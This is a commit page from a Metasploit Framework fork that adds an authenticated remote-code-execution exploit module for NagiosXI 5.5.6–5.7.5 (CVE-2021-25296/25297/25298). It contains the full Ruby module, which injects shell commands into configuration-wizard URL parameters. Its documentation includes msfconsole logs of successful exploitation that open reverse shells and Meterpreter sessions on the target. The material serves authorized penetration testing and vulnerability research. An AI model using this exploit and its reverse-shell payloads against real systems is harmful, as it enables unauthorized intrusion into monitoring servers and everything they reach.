dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Land #17494, Add NagiosXI authenticated RCE (CVE-2021-25296, CVE-2021-25297,CVE-2021-25298) exploit module

This commit is contained in:
Grant Willcox 2023-02-07 15:38:36 -06:00
parent 4143e6ea92 52fa2e5be6
commit c2e8f3fa69
No known key found for this signature in database
GPG Key ID: D35E05C0F2B81E83
2 changed files with 723 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

451
documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md Normal file
View File

@ -0,0 +1,451 @@
## Vulnerable Application
This module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298: OS command injection vulnerabilities
in `/nagiosxi/config/monitoringwizard.php` that enable an authenticated user to achieve remote code execution
on NagiosXI from versions 5.5.6 to 5.7.5 as the `apache` user. There are three vulnerable configuration wizards
(`windowswmi`, `switch`, `cloud-vm`). The `windowswmi` configuration wizard is vulnerable
to CVE-2021-25296 via command injection in the `plugin_output_len` parameter. `switch` and
`cloud-vm` are vulnerable to CVE-2021-25297 and CVE-2021-25298 respectively, and use the
`ip_address` parameter, though on version 5.5.7 and prior of NagiosXI this parameter was
named `address`.
The module's `check` method takes advantage of the `Msf::Exploit::Remote::HTTP::NagiosXi` mixin in order to authenticate
to the target and obtain the version of Nagios XI installed, which is then used to check if the target is running a version
of NagiosXI between versions 5.5.6 and 5.7.5.
### Installation Steps
Note: The module can attempt to complete the configuration steps after NagiosXI has been installed.
#### Pre-installed OVA
1. Download an OVA with NagiosXI installed
1. An OVA with a vulnerable NagiosXI 5.7.5 application can be downloaded from
Nagios [here](https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.7.5-64.ova).
2. To download other vulnerable versions, replace the version number in the URL with the desired version.
2. Configure the NagiosXI installation
1. The OVA has NagiosXI running on startup. Launch the VM and visit the VM's IP in a browser.
2. Go through defaults on the install. When you get to Admin Account Settings, configure the `nagiosadmin`
user's password and whether you'd like to force HTTPS.
3. Login as the `nagiosadmin` user and accept the license agreement when prompted.
#### Manual Install on Linux
Note: NagiosXI can only be installed on specific operating systems (RHEL, CentOS, Oracle Linux, Debian, Ubuntu).
Supported version numbers can be found in the installation guide
[here](https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf). Older versions of
NagiosXI might require older versions of the operating systems mentioned. Consult the specific version's documentation if errors occur
on newer distributions.
1. Download NagiosXI
1. Choose a version between 5.5.6 and 5.7.5 from [here](https://www.nagios.com/downloads/nagios-xi/older-releases/)
2. Install NagiosXI with the following commands
1. `tar xzf xi-5.7.5.gz`
2. `cd nagiosxi`
3. `./fullinstall`
3. Configure the NagiosXI installation
1. Visit the installed NagiosXI application in a web browser.
2. Go through defaults on the install. When you get to Admin Account Settings, configure the `nagiosadmin`
user's password and whether you'd like to force HTTPS.
3. Login as the `nagiosadmin` user and accept the license agreement when prompted.
### Troubleshooting Installation
- NagiosXI doesn't show it's ip address
- Login as the `root` user with `nagiosxi` as the password, and run `ip a` to get the IP
- Ensure it's on a network accessible from your attacking machine (e.g. NAT network instead of Bridged)
- NagiosXI fails when attempting to login manually with an "NSP Sorry Dave" message
- The NagiosXI installation is likely out of sync with its date/time.
- Set it manually with `timedatectl set-ntp false` and `timedatectl set-time '2023-02-06 17:34:00'` but with the actual time and date
## Verification Steps
- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/nagios_xi_configwizards_authenticated_rce`
- [ ] `set RHOSTS TARGET_IP`
- [ ] `set RPORT 443`
- [ ] `set SSL true`
- [ ] `set USERNAME USER`
- [ ] `set PASSWORD PASSWORD`
- [ ] `set TARGET_CVE CVE-2021-25296`
- [ ] `set LHOST YOUR_IP`
- [ ] `set LPORT YOUR_LISTENING_PORT`
- [ ] `run`
## Options
### USERNAME
A valid NagiosXI username, which can be for an administrator or regular user.
### PASSWORD
The password for the provided NagiosXI username.
### TARGET_CVE
The CVE to target. Each CVE corresponds to a specific target:
- CVE-2021-25296: `windowswmi` configuration wizard RCE via the `plugin_output_len` URL parameter
- CVE-2021-25297: `switch` configuration wizard RCE via the `ip_address` URL parameter.
Note that on versions 5.5.7 and prior this parameter is named `address` instead.
- CVE-2021-25298: `cloud-vm` configuration wizard RCE via the `ip_address` URL parameter.
Note that on versions 5.5.7 and prior this parameter is named `address` instead.
Note that CVE-2021-25298 is in the `cloud-vm` configuration wizard but we set the `wizard`
URL parameter value to `digitalocean` in order to make sure we use this wizard; there are
potentially other values that could be used here.
## Scenarios
### CentOS7 Running NagiosXI 5.7.5 (Official OVA) - CVE-2021-25296
```
msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
[*] Using configured payload cmd/unix/reverse_perl_ssl
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOST 192.168.153.132
RHOST => 192.168.153.132
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.153.128
LHOST => 192.168.153.128
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set FINISH_INSTALL true
FINISH_INSTALL => true
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set USERNAME nagiosadmin
USERNAME => nagiosadmin
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set PASSWORD nagiosadmin
PASSWORD => nagiosadmin
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOST 192.168.153.132
RHOST => 192.168.153.132
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.153.128
LHOST => 192.168.153.128
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set FIN
set FINGERPRINTCHECK set FINISH_INSTALL
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set FINISH_INSTALL true
FINISH_INSTALL => true
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > show options
Module options (exploit/linux/http/nagios_xi_configwizards_authenticated_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
FINISH_INSTALL true no If the Nagios XI installation has not been completed,
try to do so. This includes signing the license agreem
ent.
PASSWORD nagiosadmin no Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port
][...]
RHOSTS 192.168.153.132 yes The target host(s), see https://github.com/rapid7/meta
sploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This
must be an address on the local machine or 0.0.0.0 to
listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly
generated)
TARGETURI /nagiosxi/ yes The base path to the Nagios XI application
TARGET_CVE CVE-2021-25296 yes CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE
-2021-25298)
URIPATH no The URI to use for this exploit (default is random)
USERNAME nagiosadmin no Username to authenticate with
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_perl_ssl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.153.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 CMD
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > exploit
[*] Started reverse SSL handler on 192.168.153.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[!] The target seems to be a Nagios XI application that has not been fully installed yet.
[*] Attempting to finish the Nagios XI installation on the target using the provided password. The username will be `nagiosadmin`.
[*] Attempting to authenticate to Nagios XI...
[!] The Nagios XI license agreement has not yet been signed on the target.
[*] Attempting to sign the Nagios XI license agreement...
[*] License agreement signed. The module will wait for 5 seconds and retry the login.
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.7.5.
[+] The target appears to be vulnerable.
[*] Sending the payload...
[*] Command shell session 1 opened (192.168.153.128:4444 -> 192.168.153.132:56222) at 2023-02-07 11:33:53 -0600
id
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
pwd
/usr/local/nagiosxi/html/config
uname -a
Linux localhost.localdomain 3.10.0-1160.2.2.el7.x86_64 #1 SMP Tue Oct 20 16:53:08 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
```
### CentOS7 Running NagiosXI 5.7.5 (Official OVA) - CVE-2021-25297
```
msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
[*] Using configured payload cmd/unix/reverse_perl_ssl
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOST 192.168.153.132
RHOST => 192.168.153.132
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.153.128
LHOST => 192.168.153.128
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set USERNAME nagiosadmin
USERNAME => nagiosadmin
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set PASSWORD nagiosadmin
PASSWORD => nagiosadmin
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > show options
Module options (exploit/linux/http/nagios_xi_configwizards_authenticated_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
FINISH_INSTALL false no If the Nagios XI installation has not been completed,
try to do so. This includes signing the license agreem
ent.
PASSWORD nagiosadmin no Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port
][...]
RHOSTS 192.168.153.132 yes The target host(s), see https://github.com/rapid7/meta
sploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This
must be an address on the local machine or 0.0.0.0 to
listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly
generated)
TARGETURI /nagiosxi/ yes The base path to the Nagios XI application
TARGET_CVE CVE-2021-25296 yes CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE
-2021-25298)
URIPATH no The URI to use for this exploit (default is random)
USERNAME nagiosadmin no Username to authenticate with
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_perl_ssl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.153.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 CMD
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set TARGET_CVE CVE-2021-25297
TARGET_CVE => CVE-2021-25297
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > exploit
[*] Started reverse SSL handler on 192.168.153.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.7.5.
[+] The target appears to be vulnerable.
[*] Sending the payload...
[*] Command shell session 1 opened (192.168.153.128:4444 -> 192.168.153.132:56322) at 2023-02-07 11:44:00 -0600
id
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
whoami
apache
uname -a
Linux localhost.localdomain 3.10.0-1160.2.2.el7.x86_64 #1 SMP Tue Oct 20 16:53:08 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
```
### CentOS7 Running NagiosXI 5.7.5 (Official OVA) - CVE-2021-25298
```
msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
[*] Using configured payload cmd/unix/reverse_perl_ssl
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set USERNAME nagiosadmin
USERNAME => nagiosadmin
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set PASSWORD nagiosadmin
PASSWORD => nagiosadmin
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set TARGET_CVE CVE-2021-25298
TARGET_CVE => CVE-2021-25298
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.153.128
LHOST => 192.168.153.128
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOST 192.168.153.132
RHOST => 192.168.153.132
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set TARGET Linux\ (x64)
TARGET => Linux (x64)
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > show options
Module options (exploit/linux/http/nagios_xi_configwizards_authenticated_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
FINISH_INSTALL false no If the Nagios XI installation has not been completed,
try to do so. This includes signing the license agreem
ent.
PASSWORD nagiosadmin no Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port
][...]
RHOSTS 192.168.153.132 yes The target host(s), see https://github.com/rapid7/meta
sploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This
must be an address on the local machine or 0.0.0.0 to
listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly
generated)
TARGETURI /nagiosxi/ yes The base path to the Nagios XI application
TARGET_CVE CVE-2021-25298 yes CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE
-2021-25298)
URIPATH no The URI to use for this exploit (default is random)
USERNAME nagiosadmin no Username to authenticate with
VHOST no HTTP server virtual host
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.153.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Linux (x64)
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LPORT 9912
LPORT => 9912
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set FINISH_INSTALL true
FINISH_INSTALL => true
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > exploit
[*] Started reverse TCP handler on 192.168.153.128:9912
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[!] The target seems to be a Nagios XI application that has not been fully installed yet.
[*] Attempting to finish the Nagios XI installation on the target using the provided password. The username will be `nagiosadmin`.
[*] Attempting to authenticate to Nagios XI...
[!] The Nagios XI license agreement has not yet been signed on the target.
[*] Attempting to sign the Nagios XI license agreement...
[*] License agreement signed. The module will wait for 5 seconds and retry the login.
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.7.5.
[+] The target appears to be vulnerable.
[*] Sending the payload...
[*] Sending stage (3045348 bytes) to 192.168.153.132
[*] Meterpreter session 1 opened (192.168.153.128:9912 -> 192.168.153.132:32878) at 2023-02-07 11:48:50 -0600
[*] Command Stager progress - 100.00% done (833/833 bytes)
meterpreter >
meterpreter > getuid
Server username: apache
meterpreter > getprivs
[-] The "getprivs" command is not supported by this Meterpreter type (x64/linux)
meterpreter > sysinfo
Computer : localhost.localdomain
OS : CentOS 7.9.2009 (Linux 3.10.0-1160.2.2.el7.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > pwd
/usr/local/nagiosxi/html/config
meterpreter >
```
### CentOS7 Running NagiosXI 5.5.6 (Official OVA) - CVE-2021-25297
```
msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
[*] Using configured payload cmd/unix/reverse_perl_ssl
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOSTS 192.168.104.18
RHOSTS => 192.168.104.18
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set PASSWORD nagiosadmin
PASSWORD => nagiosadmin
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set TARGET_CVE CVE-2021-25297
TARGET_CVE => CVE-2021-25297
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.104.2
LHOST => 192.168.104.2
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LPORT 8443
LPORT => 8443
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > show options
Module options (exploit/linux/http/nagios_xi_configwizards_authenticated_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
FINISH_INSTALL false no If the Nagios XI installation has not been completed, try to do so. This includes signin
g the license agreement.
PASSWORD nagiosadmin no Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.104.18 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasp
loit
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local m
achine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /nagiosxi/ yes The base path to the Nagios XI application
TARGET_CVE CVE-2021-25297 yes CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298)
URIPATH no The URI to use for this exploit (default is random)
USERNAME nagiosadmin no Username to authenticate with
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_perl_ssl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.104.2 yes The listen address (an interface may be specified)
LPORT 8443 yes The listen port
Exploit target:
Id Name
-- ----
2 CMD
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > exploit
[*] Started reverse SSL handler on 192.168.104.2:8443
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.5.6.
[+] The target appears to be vulnerable.
[*] Sending the payload...
[*] Command shell session 1 opened (192.168.104.2:8443 -> 192.168.104.18:58930) at 2023-02-07 14:27:41 -0500
id
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
whoami
apache
uname -a
Linux localhost.localdomain 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
```

272
modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb Normal file
View File

@ -0,0 +1,272 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HTTP::NagiosXi
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection',
'Description' => %q{
This module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298, which are
OS command injection vulnerabilities in the windowswmi, switch, and cloud-vm
configuration wizards that allow an authenticated user to perform remote code
execution on Nagios XI versions 5.5.6 to 5.7.5 as the apache user.
Valid credentials for a Nagios XI user are required. This module has
been successfully tested against official NagiosXI OVAs from 5.5.6-5.7.5.
},
'License' => MSF_LICENSE,
'Author' => [
'Matthew Mathur'
],
'References' => [
['CVE', '2021-25296'],
['CVE', '2021-25297'],
['CVE', '2021-25298'],
['URL', 'https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md']
],
'Platform' => %w[linux unix],
'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
'Targets' => [
[
'Linux (x86)', {
'Arch' => [ ARCH_X86 ],
'Platform' => 'linux',
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
}
],
[
'Linux (x64)', {
'Arch' => [ ARCH_X64 ],
'Platform' => 'linux',
'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
}
],
[
'CMD', {
'Arch' => [ ARCH_CMD ],
'Platform' => 'unix',
# the only reliable payloads against a typical Nagios XI host (CentOS 7 minimal) seem to be cmd/unix/reverse_perl_ssl and cmd/unix/reverse_openssl
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' }
}
]
],
'Privileged' => false,
'DefaultTarget' => 2,
'DisclosureDate' => '2021-02-13',
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION ]
}
)
)
register_options [
OptString.new('TARGET_CVE', [true, 'CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298)', 'CVE-2021-25296'])
]
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def finish_install
datastore['FINISH_INSTALL']
end
# Returns a status code an a error message on failure.
# On success returns the status code and an array so we
# can update the login_result and res_array variables appropriately.
def handle_unsigned_license(res_array, username, password, finish_install)
auth_cookies, nsp = res_array
sign_license_result = sign_license_agreement(auth_cookies, nsp)
if sign_license_result
return 5, 'Failed to sign license agreement'
end
print_status('License agreement signed. The module will wait for 5 seconds and retry the login.')
sleep 5
login_result, res_array = login_after_install_or_license(username, password, finish_install)
case login_result
when 1..4 # An error occurred, propagate the error message
return login_result, res_array[0]
when 5 # The Nagios XI license agreement still has not been signed
return 5, 'Failed to sign the license agreement.'
end
return login_result, res_array
end
def authenticate
# Use nagios_xi_login to try and authenticate.
login_result, res_array = nagios_xi_login(username, password, finish_install)
case login_result
when 1..3 # An error occurred, propagate the error message
return login_result, res_array[0]
when 4 # Nagios XI is not fully installed
install_result = install_nagios_xi(password)
if install_result # On installation failure, result is an array with the code and error message
return install_result[0], install_result[1]
end
login_result, res_array = login_after_install_or_license(username, password, finish_install)
case login_result
when 1..4 # An error occurred, propagate the error message
return login_result, res_array[0]
when 5 # The license agreement still needs to be signed
login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
return login_result, res_array unless (login_result == 0)
end
when 5 # The license agreement still needs to be signed
login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
return login_result, res_array unless (login_result == 0)
end
print_good('Successfully authenticated to Nagios XI.')
# Extract the authenticated cookies and nsp to use throughout the module
if res_array.length == 2
auth_cookies = res_array[1]
if auth_cookies && /nagiosxi=[a-z0-9]+;/.match(auth_cookies)
@auth_cookies = auth_cookies
else
return login_result, 'Failed to extract authentication cookies'
end
nsp = res_array[0].match(/nsp_str = "([a-z0-9]+)/)
if nsp
@nsp = nsp[1]
else
return login_result, 'Failed to extract nsp string'
end
else
return login_result, 'Failed to extract auth cookies and nsp string'
end
# Set the version here so both check and exploit can use it
nagios_version = nagios_xi_version(res_array[0])
if nagios_version.nil?
return 6, 'Unable to obtain the Nagios XI version from the dashboard'
end
print_status("Target is Nagios XI with version #{nagios_version}.")
# Versions of NagiosXI pre-5.2 have different formats (5r1.0, 2014r2.7, 2012r2.8b, etc.) that Rex cannot handle,
# so we set pre-5.2 versions to 1.0.0 for easier Rex comparison because the module only works on post-5.2 versions.
if /^\d{4}r\d(?:\.\d)?(?:(?:RC\d)|(?:[a-z]{1,3}))?$/.match(nagios_version) || nagios_version == '5r1.0'
nagios_version = '1.0.0'
end
@version = Rex::Version.new(nagios_version)
return 0, 'Successfully authenticated and retrieved NagiosXI Version.'
end
def check
# Authenticate to ensure we can access the NagiosXI version
auth_result, err_msg = authenticate
case auth_result
when 1
return CheckCode::Unknown(err_msg)
when 2, 4, 5, 6
return CheckCode::Detected(err_msg)
when 3
return CheckCode::Safe(err_msg)
end
if @version >= Rex::Version.new('5.5.6') && @version <= Rex::Version.new('5.7.5')
return CheckCode::Appears
end
return CheckCode::Safe
end
def execute_command(cmd, _opts = {})
if !@nsp || !@auth_cookies # Check to see if we already authenticated during the check
auth_result, err_msg = authenticate
case auth_result
when 1
fail_with(Failure::Disconnected, err_msg)
when 2, 4, 5, 6
fail_with(Failure::UnexpectedReply, err_msg)
when 3
fail_with(Failure::NotVulnerable, err_msg)
end
end
# execute payload based on the selected targeted configuration wizard
url_params = {
'update' => 1,
'nsp' => @nsp
}
# After version 5.5.7, the URL parameter used in CVE-2021-25297 and CVE-2021-25298
# changes from address to ip_address
if @version <= Rex::Version.new('5.5.7')
address_param = 'address'
else
address_param = 'ip_address'
end
# CVE-2021-25296 affects the windowswmi configuration wizard.
if datastore['TARGET_CVE'] == 'CVE-2021-25296'
url_params = url_params.merge({
'nextstep' => 3,
'wizard' => 'windowswmi',
'ip_address' => Array.new(4) { rand(256) }.join('.'),
'domain' => Rex::Text.rand_text_alphanumeric(7..15),
'username' => Rex::Text.rand_text_alphanumeric(7..20),
'password' => Rex::Text.rand_text_alphanumeric(7..20),
'plugin_output_len' => Rex::Text.rand_text_numeric(5) + "; #{cmd};"
})
# CVE-2021-25297 affects the switch configuration wizard.
elsif datastore['TARGET_CVE'] == 'CVE-2021-25297'
url_params = url_params.merge({
'nextstep' => 3,
'wizard' => 'switch',
address_param => Array.new(4) { rand(256) }.join('.') + "\"; #{cmd};",
'snmpopts[snmpcommunity]' => Rex::Text.rand_text_alphanumeric(7..15),
'scaninterfaces' => 'on'
})
# CVE-2021-25298 affects the cloud-vm configuration wizard, which we can access by
# specifying the digitalocean option for the wizard parameter.
elsif datastore['TARGET_CVE'] == 'CVE-2021-25298'
url_params = url_params.merge({
address_param => Array.new(4) { rand(256) }.join('.') + "; #{cmd};",
'nextstep' => 4,
'wizard' => 'digitalocean'
})
else
fail_with(Failure::BadConfig, 'Invalid TARGET_CVE: Choose CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298.')
end
print_status('Sending the payload...')
# Send the final request. Note that the target is not expected to respond if we get
# code execution. Therefore, we set the timeout on this request to 0.
send_request_cgi({
'method' => 'GET',
'uri' => '/nagiosxi/config/monitoringwizard.php',
'cookie' => @auth_cookies,
'vars_get' => url_params
})
end
def exploit
if target.arch.first == ARCH_CMD
execute_command(payload.encoded)
else
execute_cmdstager(background: true)
end
end
end